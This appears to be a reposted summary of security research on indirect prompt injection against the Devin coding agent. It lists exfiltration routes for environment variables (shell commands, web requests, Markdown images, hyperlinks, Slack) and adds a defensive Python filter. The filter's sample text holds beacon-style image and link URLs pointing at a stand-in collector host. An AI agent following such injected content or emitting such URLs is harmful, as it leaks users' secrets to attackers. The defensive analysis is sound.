How Devin AI Can Leak Your Secrets via Multiple Means · Embrace The Red

Security researchers have detailed multiple methods for exfiltrating sensitive data from Devin, an AI-powered software development agent, through indirect prompt injection attacks. By exploiting Devin’s built-in Browser and Shell tools, attackers can trick the system into sending environment variables and other secrets to third-party servers via terminal commands, malicious web requests, or encoded URLs. Additional vectors include rendering Markdown images from untrusted domains, embedding hidden data in hyperlinks, and using Slack integrations for covert leaks. The vulnerabilities—reported to vendor Cognition in April 2025—remain unpatched, with researchers recommending restricted internet access by default, disabling untrusted content rendering, and implementing fine-grained access controls. The findings underscore the risk of over-reliance on AI agents to self-govern in hostile environments.

Edward Kiledjian @ekiledjian
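An added example, not part of the original post or of Devin's code: one way to apply the "disable untrusted content rendering" recommendation is to filter agent output before it is rendered, dropping Markdown images and unwrapping links whose host is not on an allowlist. The allowlist, the hostnames and the sample text are constructed assumptions.

```python
import re
from urllib.parse import urlsplit

# Assumed allowlist for this example; a real deployment supplies its own.
ALLOWED_HOSTS = {"docs.example.com"}

# Inline Markdown image or link: optional "!", [text], (url "optional title").
# Reference-style definitions and raw HTML <img>/<a> tags are out of scope
# here and need their own handling (or an HTML sanitizer after rendering).
MD_REF = re.compile(r'(!?)\[([^\]]*)\]\(\s*<?([^)\s>]+)>?[^)]*\)')

def host_allowed(url, allowed=ALLOWED_HOSTS):
    """True for http(s) URLs on an allowlisted host and for same-origin relative URLs."""
    parts = urlsplit(url)
    if parts.scheme not in ("http", "https"):
        # Relative paths stay on the rendering origin; "//host/x", "data:",
        # "javascript:" and similar are rejected.
        return parts.scheme == "" and parts.netloc == ""
    return (parts.hostname or "").lower() in allowed

def sanitize(markdown, allowed=ALLOWED_HOSTS):
    """Return (safe_markdown, blocked_urls) for untrusted agent output."""
    blocked = []

    def repl(match):
        bang, text, url = match.groups()
        if host_allowed(url, allowed):
            return match.group(0)
        blocked.append(url)  # keep for logging and alerting
        # Images are removed so no request fires on render;
        # links are reduced to their visible text.
        return "[image removed]" if bang else text

    return MD_REF.sub(repl, markdown), blocked

# Constructed sample output, using the reserved .invalid TLD.
SAMPLE = (
    "Build finished. ![status](https://collector.invalid/p.png?d=CONSTRUCTED)\n"
    "See the [setup guide](https://docs.example.com/setup) or "
    "[full log](https://collector.invalid/log?e=CONSTRUCTED)\n"
    "![logo](/static/logo.png)"
)

if __name__ == "__main__":
    safe, blocked = sanitize(SAMPLE)
    print(safe)
    print("blocked:", blocked)
```

Output filtering of this kind only covers the rendering vectors; the Shell and Browser tool vectors described above still depend on restricting the agent's network egress.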